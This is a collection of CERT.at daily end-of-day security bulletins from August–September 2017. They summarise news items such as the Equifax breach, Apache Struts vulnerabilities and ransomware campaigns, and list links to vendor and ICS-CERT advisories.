=====================
= End-of-Day report =
=====================
Timeframe: Thursday 07-09-2017 18:00 − Friday 08-09-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Data of 143 million US citizens stolen ∗∗∗
---------------------------------------------
In a cyberattack on the US financial services provider Equifax, extremely sensitive data of millions of Americans was captured, which now enables fraud on a large scale.
---------------------------------------------
https://futurezone.at/digital-life/daten-von-143-millionen-us-amerikanern-e…
∗∗∗ Android Toast Overlay Attack: “Cloak and Dagger” with No Permissions ∗∗∗
---------------------------------------------
Palo Alto Networks Unit 42 researchers have uncovered a high severity vulnerability in the Android overlay system, which allows a new Android overlay attack by using the "Toast type" overlay.
---------------------------------------------
https://researchcenter.paloaltonetworks.com/2017/09/unit42-android-toast-ov…
∗∗∗ YASRV (Yet Another Struts RCE Vulnerability) yes a different one from yesterday ∗∗∗
---------------------------------------------
Yesterday saw CVE-2017-9805; today we have a new remote code execution vulnerability in Apache Struts 2, which is CVE-2017-12611. Yesterday's was in the REST API and related to unsafe Java XML deserialization. Today's relates to using Freemarker in your application. Both should encourage you to patch.
---------------------------------------------
https://isc.sans.edu/diary/rss/22796
∗∗∗ Secure microkernel in a KVM switch offers spy-grade app virtualization ∗∗∗
---------------------------------------------
Need a few air-gapped apps on one screen? Here's how. Researchers at Australian think tank Data61 and the nation's Defence Science and Technology Group have cooked up application publishing for the paranoid, by baking an ARM CPU and secure microkernel into a KVM switch.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2017/09/07/cross_domai…
∗∗∗ TLS certificates: CAAs are meant to rein in certificate authorities ∗∗∗
---------------------------------------------
Admins can use a Certification Authority Authorization record in DNS to specify who is allowed to sign certificates for their domain. From 8 September, these specifications are binding for certificate authorities.
---------------------------------------------
https://heise.de/-3822010
∗∗∗ Six vulnerabilities discovered in Android bootloaders of well-known manufacturers ∗∗∗
---------------------------------------------
Automated analysis of the code of two Android bootloaders uncovered a total of six vulnerabilities. Denial of service and access to sensitive data are possible consequences, but only if the attacker already has root privileges.
---------------------------------------------
https://heise.de/-3824289
∗∗∗ Vulnerability in TYPO3 repository as possible loophole for trojanized extensions ∗∗∗
---------------------------------------------
Because of a bug, third parties may under certain circumstances have been able to access the TYPO3 Extension Repository with an arbitrary password. The developers now warn of possible extensions containing malicious code.
---------------------------------------------
https://heise.de/-3825378
∗∗∗ No card activation required at card complete ∗∗∗
---------------------------------------------
Criminals are sending a fake card complete message. It claims that customers' credit cards have been blocked. To reactivate them, customers are asked to disclose personal data. Anyone who complies sends their credit card information to fraudsters.
---------------------------------------------
https://www.watchlist-internet.at/phishing/keine-kartenaktivierung-bei-card…
=====================
= Advisories =
=====================
∗∗∗ Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017 ∗∗∗
---------------------------------------------
On September 5, 2017, the Apache Software Foundation released security bulletins that disclose three vulnerabilities in the Apache Struts 2 package. Of these vulnerabilities, the Apache Software Foundation classifies one as Critical Severity, one as Medium Severity, and one as Low Severity. For more information about the vulnerabilities, refer to the Details section of this advisory. Multiple Cisco products incorporate a version of the Apache Struts 2 package that is affected ...
---------------------------------------------
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco…
∗∗∗ Smiths Medical Medfusion 4000 Wireless Syringe Infusion Pump Vulnerabilities ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-17-250-02
∗∗∗ SpiderControl SCADA Web Server ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-250-01
∗∗∗ PHOENIX CONTACT, Innominate Security Technologies mGuard Firmware ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-250-02
∗∗∗ i-SENS Inc. SmartLog Diabetes Management Software ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSMA-17-250-01
∗∗∗ GDK-PixBuf: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1587/
∗∗∗ Security Advisory - MITM Vulnerability in Huawei Themes App in Some Mobile Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170908-…
∗∗∗ IBM Security Bulletin: Vulnerability in IBM® Java SDK affects multiple IBM Rational products based on IBM Jazz technology ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007909
∗∗∗ IBM Security Bulletin: Open Source XStream as used in IBM QRadar SIEM is vulnerable to Denial of Service. (CVE-2017-7957) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22008217
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg22005380
∗∗∗ IBM Security Bulletin: IBM Java SDK as used in IBM QRadar SIEM is vulnerable to multiple CVE’s. ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22008210
∗∗∗ IBM Security Bulletin: IBM QRadar SIEM is vulnerable to information exposure. (CVE-2017-1162) ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22008194
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 06-09-2017 18:00 − Thursday 07-09-2017 18:00
Handler: Stefan Lenzhofer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ BlackBerry powered by Android Security Bulletin – September 2017 ∗∗∗
---------------------------------------------
http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber…
∗∗∗ Ransomware: What you need to know now | Salted Hash Ep 1, Pt 4 ∗∗∗
---------------------------------------------
Reporters Fahmida Rashid and Steve Ragan talk about the latest ransomware threats, the holes in IT security and the burdens on enterprises.
---------------------------------------------
https://www.csoonline.com/video/81516/ransomware-what-you-need-to-know-now-…
∗∗∗ Microsoft Programming Error is Behind Dangerous Kernel Bug, Researchers Claim ∗∗∗
---------------------------------------------
Researchers say an 18-year-old programming error by Microsoft is creating a kernel bug that can be abused by an attacker.
---------------------------------------------
http://threatpost.com/microsoft-programming-error-is-behind-dangerous-kerne…
∗∗∗ Interesting List of Windows Processes Killed by Malicious Software ∗∗∗
---------------------------------------------
Just a quick blog post about an interesting sample that I found today. Usually, modern pieces of malware implement anti-debugging and anti-VM techniques. They perform some checks against the target and when a positive result is found, they silently exit… Such checks might be testing the screen resolution, the activity
---------------------------------------------
https://blog.rootshell.be/2017/09/06/interesting-list-windows-processes-kil…
∗∗∗ Apache Struts “serialisation” vulnerability – what you need to know ∗∗∗
---------------------------------------------
A bug in Apache Struts, a popular software toolkit for building web services, could let crooks take control of your server.
---------------------------------------------
https://nakedsecurity.sophos.com/2017/09/06/apache-struts-serialisation-vul…
∗∗∗ Hackers Are Distributing Backdoored Cobian RAT Hacking tool For Free ∗∗∗
---------------------------------------------
Nothing is free in this world. If you are searching for free ready-made hacking tools on the Internet, then beware—most freely available tools, claiming to be the swiss army knife for hackers, are nothing but a hoax. Last year, we reported about one such Facebook hacking tool that actually had the capability to hack a Facebook account, but yours and not the one you desire to hack.
---------------------------------------------
https://thehackernews.com/2017/09/backdoored-hacking-tools.html
∗∗∗ Expired domain names and malvertising - Malwarebytes Labs ∗∗∗
---------------------------------------------
https://blog.malwarebytes.com/threat-analysis/2017/09/expired-domain-names-…
∗∗∗ Fake Microsoft warning leads to data theft ∗∗∗
---------------------------------------------
Criminals are faking a Microsoft warning notice. In it they claim that the recipients' computers are infected with malware. Supposed victims are therefore asked to contact a customer hotline. In reality they reach criminals who demand access to the computer, copy files and steal payment data.
---------------------------------------------
https://www.watchlist-internet.at/sonstiges/gefaelschte-microsoft-warnung-f…
=====================
= Advisories =
=====================
∗∗∗ IBM Notes: Two vulnerabilities allow denial-of-service attacks ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1567/
∗∗∗ Cisco ASR 5500 Series Routers: A vulnerability allows a denial-of-service attack ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1571/
∗∗∗ Cisco Prime Collaboration Provisioning Tool: Two vulnerabilities allow disclosure of information and manipulation of arbitrary system files ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1574/
∗∗∗ Cisco ASR 920 Series Router: Two vulnerabilities allow execution of arbitrary code and manipulation of files ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1578/
∗∗∗ Cisco IOS, Cisco IOS XE: Two vulnerabilities allow various denial-of-service attacks ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1579/
∗∗∗ Cisco IR800 Integrated Services Router: A vulnerability allows complete compromise of the system ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1580/
∗∗∗ Cisco Prime LAN Management Solution Token ID Reuse Lets Remote Authenticated Users Hijack the Target User's Session ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039285
∗∗∗ Cisco Catalyst 4000 Series Switch Dynamic ACL Bug Lets Remote Users Bypass Port Access Controls on the Target System ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039284
∗∗∗ TYPO3 API Bug Lets Remote Users Obtain Potentially Sensitive Version Information on the Target System ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039294
∗∗∗ TYPO3 File Storage Access Control Flaw Lets Remote Authenticated Users Obtain Potentially Sensitive Information ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039293
∗∗∗ TYPO3 Input Validation Flaw in Backend Forms Lets Remote Users Conduct Cross-Site Scripting Attacks ∗∗∗
---------------------------------------------
http://www.securitytracker.com/id/1039292
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 05-09-2017 18:00 − Wednesday 06-09-2017 18:00
Handler: Stefan Lenzhofer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers Gain ‘Switch-Flipping’ Access to US Power Systems ∗∗∗
---------------------------------------------
Hackers who hit American utilities this summer had the power to cause blackouts, Symantec says.
---------------------------------------------
https://www.wired.com/story/hackers-gain-switch-flipping-access-to-us-power…
see also: http://derstandard.at/2000063697965
see also: https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targ…
see also: https://www.bleepingcomputer.com/news/security/sabotage-warning-issued-on-h…
∗∗∗ SynAck Ransomware Sees Huge Spike in Activity ∗∗∗
---------------------------------------------
Over the past two days, there was an increase in activity from a relatively unknown ransomware strain named SynAck, according to submissions to the ID-Ransomware service and users who complained on the Bleeping Computer ransomware support forums. [...]
---------------------------------------------
https://www.bleepingcomputer.com/news/security/synack-ransomware-sees-huge-…
∗∗∗ Stop blaming users for security misses ∗∗∗
---------------------------------------------
Does the message to users about security need to change? Or does IT need to rebuild infrastructure so users can worry less about security? Wendy Nather, principal security strategist at Duo Security, talks with CSO senior writer Fahmida Rashid about how organizations can learn to do security right.
---------------------------------------------
https://www.csoonline.com/video/80055/stop-blaming-users-for-security-misse…
∗∗∗ Security and education in the wake of WannaCry, Petya ∗∗∗
---------------------------------------------
Attacks occur for a variety of reasons, and in the wake of the most widespread ransomware attacks, WannaCry and Petya, many organizations are re-evaluating their security practices to figure out what went wrong. While those who were hit are still trying to understand where their security gaps are, other enterprises that rely on legacy systems that can't be patched are looking for ways to prevent being the next victim. No, the vulnerabilities attackers leverage are not new. They prey on systems
---------------------------------------------
https://www.csoonline.com/article/3208384/backup-recovery/security-and-educ…
∗∗∗ The 15 biggest data breaches of the 21st century ∗∗∗
---------------------------------------------
Data breaches happen daily, in too many places at once to keep count; take today's news of another Verizon breach that exposed the personal data of 6 million customers and a somewhat less dire breach at 14 Trump hotels. But what constitutes a huge breach versus a small one? CSO compiled a list of 15 of the biggest or most significant breaches of the 21st century. This list is based not necessarily on the number of records compromised, but on how much risk or damage the breach caused for
---------------------------------------------
https://www.csoonline.com/article/2130877/data-protection/the-15-biggest-da…
∗∗∗ ShadowBrokers are back demanding nearly $4m and offering 2 dumps per month ∗∗∗
---------------------------------------------
The dreaded hacking group ShadowBrokers posted a new message, promising to deliver two data dumps a month as part of its monthly dumps. The notorious group ShadowBrokers is back, announcing new interesting changes to their Dump Service. The hackers published a new message on the Steemit platform announcing new changes to their service. "Missing theshadowbrokers? If someone […]
---------------------------------------------
http://securityaffairs.co/wordpress/62770/hacking/shadowbrokers-return.html
∗∗∗ A Critical Apache Struts Security Flaw Makes It Easy To Hack Fortune 100 Firms ∗∗∗
---------------------------------------------
An anonymous reader quotes a report from ZDNet: A critical security vulnerability in open-source server software enables hackers to easily take control of an affected server -- putting sensitive corporate data at risk. The vulnerability allows an attacker to remotely run code on servers that run applications using the REST plugin, built with Apache Struts, according to security researchers who discovered the vulnerability. All versions of Struts since 2008 are affected, said the researchers.
---------------------------------------------
https://apache.slashdot.org/story/17/09/05/2053200/a-critical-apache-struts…
∗∗∗ Hacker attacks on MongoDB hit almost 27,000 databases ∗∗∗
---------------------------------------------
Extortion attacks on vulnerable MongoDB databases have been a trend among online criminals since the end of last year. Now the racket continues: three new hacker groups are demanding bitcoins in exchange for database contents.
---------------------------------------------
https://heise.de/-3822955
∗∗∗ Security flaw affects 750,000 Estonian ID cards ∗∗∗
---------------------------------------------
An international group of cryptographers has flagged a serious security vulnerability in the chip embedded in Estonian ID cards, the country’s Information System Authority has announced. “Estonian experts assess there to be a possible security vulnerability and we will continue to verify the claims of the researchers,” said Taimar Peterkop, Director-General of the agency. “We have developed the primary solutions to mitigate the risk, and will do our utmost to ensure that
---------------------------------------------
https://www.helpnetsecurity.com/2017/09/06/estonian-id-cards-security-flaw/
=====================
= Advisories =
=====================
∗∗∗ Apache Struts: Update now and close critical vulnerability ∗∗∗
---------------------------------------------
A just-released version of Apache Struts closes a critical vulnerability. The developers and the discoverer of the vulnerability expect it to be abused soon for attacks on companies. So prompt action is called for now.
---------------------------------------------
https://heise.de/-3822948
∗∗∗ Bugtraq: [security bulletin] HPESBUX03772 rev.1 - HP-UX BIND Service Running Named, Multiple Vulnerabilities ∗∗∗
---------------------------------------------
http://www.securityfocus.com/archive/1/541129
∗∗∗ Red Hat JBoss Enterprise Application Platform: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1558/
∗∗∗ Google Android Operating System: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1556/
∗∗∗ Google Chrome, Chromium: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1563/
∗∗∗ IBM AIX, IBM VIOS, IBM Java SDK: Multiple vulnerabilities allow, among other things, complete compromise of the system ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1561/
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg22008080
=====================
= End-of-Day report =
=====================
Timeframe: Monday 04-09-2017 18:00 − Tuesday 05-09-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Six-Year-Old "Loop Bug" Re-Discovered to Affect Almost All Major PDF Viewers ∗∗∗
---------------------------------------------
A bug discovered in an obscure PDF parsing library back in 2011 is also present in most of today's top PDF viewers, according to German software developer Hanno Böck.
---------------------------------------------
https://www.bleepingcomputer.com/news/software/six-year-old-loop-bug-re-dis…
∗∗∗ TrustZone Downgrade Attack Opens Android Devices to Old Vulnerabilities ∗∗∗
---------------------------------------------
An attacker can downgrade components of the Android TrustZone technology to older versions that feature known vulnerabilities and use older exploits against smartphones running an up-to-date operating system.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/trustzone-downgrade-attack-o…
∗∗∗ The Mirai Botnet: A Look Back and Ahead At What's Next, (Tue, Sep 5th) ∗∗∗
---------------------------------------------
It is a bit hard to nail down when the Mirai botnet really started. I usually use scans for port:2323 and the use of the password "xc3511" as an indicator. But of course, that isn't perfect. The very first scan using the password "xc3511" was detected by our sensor on February 26th, 2016, well ahead of Mirai.
---------------------------------------------
https://isc.sans.edu/diary/rss/22786
∗∗∗ Hunting Pastebin with PasteHunter ∗∗∗
---------------------------------------------
From a security analytics and Threat Intelligence perspective Pastebin is a treasure trove of information. All content that is uploaded to pastebin and not explicitly set to private (which requires an account) is listed and can be viewed by anyone.
---------------------------------------------
https://techanarchy.net/2017/09/hunting-pastebin-with-pastehunter/
∗∗∗ Hands off SHA-1: 320 million passwords cracked ∗∗∗
---------------------------------------------
If website operators do not store customers' passwords securely, a worst-case scenario is inevitable. Security researchers who cracked millions of passwords in a manageable amount of time are reminding us of this once again.
---------------------------------------------
https://heise.de/-3822005
=====================
= Advisories =
=====================
∗∗∗ Liblouis: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1547/
∗∗∗ Apache Software Foundation Struts: Multiple vulnerabilities allow execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1554/
∗∗∗ Security Notice - Statement About the Bootloader Vulnerabilities in Huawei Mobile Phones Disclosed at the USENIX Conference ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-notices/2017/huawei-sn-20170905-01-…
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM SDK, Java Technology Edition Quarterly CPU – Jan 2017 – Includes Oracle Jan 2017 CPU affect IBM Content Classification ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg22001461
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Content Classification ∗∗∗
---------------------------------------------
https://www-01.ibm.com/support/docview.wss?uid=swg21996956
∗∗∗ Arbitrary Code Execution in TYPO3 CMS ∗∗∗
---------------------------------------------
https://typo3.org/news/article/arbitrary-code-execution-in-typo3-cms/
∗∗∗ Information Disclosure in TYPO3 CMS ∗∗∗
---------------------------------------------
https://typo3.org/news/article/information-disclosure-in-typo3-cms-1/
∗∗∗ Information Disclosure in TYPO3 CMS ∗∗∗
---------------------------------------------
https://typo3.org/news/article/information-disclosure-in-typo3-cms/
∗∗∗ Cross-Site Scripting in TYPO3 CMS Backend ∗∗∗
---------------------------------------------
https://typo3.org/news/article/cross-site-scripting-in-typo3-cms-backend/
∗∗∗ USN-3409-1: FontForge vulnerabilities ∗∗∗
---------------------------------------------
http://www.ubuntu.com/usn/usn-3409-1/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 01-09-2017 18:00 − Monday 04-09-2017 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ RTP Bleed: Eavesdropping on phone calls via Asterisk bug ∗∗∗
---------------------------------------------
A bug in the IP telephony solution Asterisk allows attackers to listen in on phone calls. The problem lies in the underlying RTP implementation. A first patch is available, but it is still flawed.
---------------------------------------------
https://www.golem.de/news/rtp-bleed-mit-asterisk-bug-telefonate-belauschen-…
∗∗∗ Malspam pushing Locky ransomware tries HoeflerText notifications for Chrome and FireFox ∗∗∗
---------------------------------------------
2017-09-01 update: A different campaign using HoeflerText popups has been active during the same timeframe. I wrote about it here, but the only thing these two campaigns have in common is that they both used HoeflerText popups.
---------------------------------------------
https://isc.sans.edu/forums/diary/Malspam+pushing+Locky+ransomware+tries+Ho…
∗∗∗ Bug in API: Contact details of possibly millions of Instagram users exposed ∗∗∗
---------------------------------------------
Because of a bug in the communication interface to other apps, millions of Instagram users have to fear for their privacy. According to the Facebook subsidiary, not only celebrities are affected.
---------------------------------------------
https://heise.de/-3820497
∗∗∗ Multiple security vulnerabilities in RubyGems ∗∗∗
---------------------------------------------
Ruby's package system RubyGems contains vulnerabilities that allow, among other things, DoS attacks and DNS hijacking. An update to the current version 2.6.13 removes the danger.
---------------------------------------------
https://heise.de/-3820891
∗∗∗ Several large torrent sites apparently offline after attacks ∗∗∗
---------------------------------------------
A number of prominent platforms such as Torrentproject are no longer reachable: domains suspended, denial-of-service attacks
---------------------------------------------
http://derstandard.at/2000063553913
=====================
= Advisories =
=====================
∗∗∗ DSA-3960 gnupg - security update ∗∗∗
---------------------------------------------
Daniel J. Bernstein, Joachim Breitner, Daniel Genkin, Leon GrootBruinderink, Nadia Heninger, Tanja Lange, Christine van Vredendaal and Yuval Yarom discovered that GnuPG is prone to a local side-channel attack allowing full key recovery for RSA-1024.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3960
∗∗∗ DSA-3961 libgd2 - security update ∗∗∗
---------------------------------------------
A double-free vulnerability was discovered in the gdImagePngPtr() function in libgd2, a library for programmatic graphics creation and manipulation, which may result in denial of service or potentially the execution of arbitrary code if a specially crafted file is processed.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3961
∗∗∗ DSA-3962 strongswan - security update ∗∗∗
---------------------------------------------
A denial of service vulnerability was identified in strongSwan, an IKE/IPsec suite, using Google's OSS-Fuzz fuzzing project.
---------------------------------------------
https://www.debian.org/security/2017/dsa-3962
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 31-08-2017 18:00 − Friday 01-09-2017 18:00
Handler: Olaf Schwarz
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Boobytrapped Word File Installs Locky Ransomware When You Close the Document ∗∗∗
---------------------------------------------
Summer vacation is over! During the past week, security researchers have discovered several distribution campaigns pushing the Locky ransomware via different methods, including a new variant that features one hell of a clever trick.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/boobytrapped-word-file-insta…
∗∗∗ US Government Site Was Hosting Ransomware ∗∗∗
---------------------------------------------
As recently as Wednesday afternoon, a U.S. government website was hosting a malicious JavaScript downloader that led victims to installations of Cerber ransomware. The malware link has since been taken down.
---------------------------------------------
http://threatpost.com/us-government-site-removes-link-to-cerber-ransomware-…
∗∗∗ Malware writer offers free trojan to hackers ... with one small drawback ∗∗∗
---------------------------------------------
Beware of geeks bearing Cobian RAT gifts. Those looking on the dark web for malware capable of hijacking computers might have thought they were getting a bargain when a free trojan appeared on various online souks over the past few months.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2017/08/31/free_trojan…
∗∗∗ Vulnerability in HPE Operations Orchestration allows remote code execution ∗∗∗
---------------------------------------------
The Operations Orchestration software allows remote code execution in all versions prior to 10.80. Hewlett Packard Enterprise advises updating. Updates are also available for two of the vendor's performance testing tools.
---------------------------------------------
https://heise.de/-3819782
=====================
= Advisories =
=====================
∗∗∗ OPW Fuel Management Systems SiteSentinel Integra and SiteSentinel iSite ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-243-04
∗∗∗ Moxa SoftCMS Live Viewer ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-243-05
∗∗∗ Automated Logic Corporation ALC WebCTRL, Liebert SiteScan, Carrier i-VU ∗∗∗
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-17-150-01
∗∗∗ Digium Asterisk, Digium Certified Asterisk: Multiple vulnerabilities allow, among other things, execution of arbitrary code ∗∗∗
---------------------------------------------
https://portal.cert.dfn.de/adv/DFN-CERT-2017-1542/
∗∗∗ SSA-866217: SMBv1 Vulnerabilities in ACUSON S1000/2000/3000 ∗∗∗
---------------------------------------------
https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-866217…
∗∗∗ Security Advisory - FRP Bypass Vulnerability in Huawei Honor 5S Smart Phones ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170901-…
∗∗∗ Security Advisory - Privilege Escalation Vulnerability in Some Huawei APKs ∗∗∗
---------------------------------------------
http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20170901-…
∗∗∗ IBM Security Bulletin: IBM Expeditor is affected by a denial of service vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22002103
∗∗∗ IBM Security Bulletin: IBM Notes is affected by a denial of service vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21999385
∗∗∗ IBM Security Bulletin: IBM Notes is affected by a denial of service vulnerability ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21999384
∗∗∗ IBM Security Bulletin: IBM Notes is affected by Open Source zlib vulnerabilities ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21997877
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by a vulnerability in Curl (CVE-2016-7167) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007553
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by vulnerabilities in bash (CVE-2016-9401, CVE-2016-7543, CVE-2016-0634) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007554
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Development Package for Apache Spark ∗∗∗
---------------------------------------------
http://www.ibm.com/support/docview.wss?uid=swg22007416
∗∗∗ IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Network Protection ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007918
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by vulnerabilities in Linux kernel ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007552
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by potential issues of XML External Entity Injection (CVE-2017-1458) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007551
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by potential issues of Cross-Site Scripting (CVE-2017-1457) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007550
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security has updated commons-fileupload for known vulnerabilities (CVE-2016-3092) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007539
∗∗∗ IBM Security Bulletin: IBM QRadar Network Security is affected by a less-secure algorithm during negotiations vulnerability (CVE-2017-1491) ∗∗∗
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg22007535
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 30-08-2017 18:00 − Donnerstag 31-08-2017 18:00
Handler: Robert Waldner
Co-Handler: Olaf Schwarz
=====================
= News =
=====================
∗∗∗ Dissecting the Chrome Extension Facebook malware ∗∗∗
---------------------------------------------
The Facebook malware that spread last week was dissected in a collaboration with Kaspersky Lab and Detectify. We were able to get help from the involved companies and cloud services to quickly shut down parts of the attack to mitigate it as fast as possible.
---------------------------------------------
http://securelist.com/dissecting-the-chrome-extension-facebook-malware/8171…
∗∗∗ Cyber Security Assessment Netherlands 2017: Digital resilience is lagging behind the increasing threat ∗∗∗
---------------------------------------------
The digital resilience of individuals and organisations is lagging behind the increasing threat. Government, business and citizens take many steps to increase digital resilience, but this is not happening fast enough. This is apparent from the Cyber Security Assessment Netherlands 2017 (CSAN 2017), which demissionary State Secretary Dijkhoff sent to parliament in June and which is being published in English today.
---------------------------------------------
https://www.ncsc.nl/english/current-topics/news/cyber-security-assessment-n…
∗∗∗ A Framework for Cyber Security Insurance ∗∗∗
---------------------------------------------
New paper: "Policy measures and cyber insurance: a framework," by Daniel Woods and Andrew Simpson, Journal of Cyber Policy, 2017. Abstract: The role of the insurance industry in driving improvements in cyber security has been identified as mutually beneficial for both insurers and policy-makers. To date, there has been no consideration of the roles governments and the insurance industry should pursue in support of this public-private partnership.
---------------------------------------------
https://www.schneier.com/blog/archives/2017/08/a_framework_for.html
∗∗∗ Mining Adminers – Hackers Scan the Internet For DB Scripts ∗∗∗
---------------------------------------------
Hackers are constantly scanning the internet for exploitable sites, which is why even small, new sites should be fully patched and protected. At the same time, it is not feasible to scan the whole internet with 330+ million domains and billions of web pages. Even Google can’t do it, but hackers are always getting better at reconnaissance. Despite these limitations, scanning just 1% of the internet allows attackers to discover thousands of vulnerable sites.
---------------------------------------------
https://blog.sucuri.net/2017/08/mining-adminers-hackers-scan-the-internet-f…
∗∗∗ St. Jude Medical pacemakers: firmware patches against security vulnerabilities ∗∗∗
---------------------------------------------
Skilled hackers can attack Abbott-brand pacemakers to execute commands and steal patient data. Implant wearers are advised to visit their doctor soon to have important firmware updates installed.
---------------------------------------------
https://heise.de/-3817954
∗∗∗ Embedded IoT: crypto library mbed TLS vulnerable to eavesdropping attacks ∗∗∗
---------------------------------------------
Under certain circumstances, attackers acting as a man in the middle could record the data exchange of devices that rely on mbed TLS. Fixed versions are available.
---------------------------------------------
https://heise.de/-3819197
∗∗∗ Vulnerability Spotlight: Multiple Gdk-Pixbuf Vulnerabilities ∗∗∗
---------------------------------------------
Today, Talos is disclosing the discovery of two remote code execution vulnerabilities which have been identified in the Gdk-Pixbuf Toolkit. This toolkit is used in multiple desktop applications including Chromium, Firefox, GNOME thumbnailer, VLC and others. Exploiting this vulnerability allows an attacker to gain full control over the victim's machine.
---------------------------------------------
http://blog.talosintelligence.com/2017/08/vuln-spotlight-multiple-gdk.html
=====================
= Advisories =
=====================
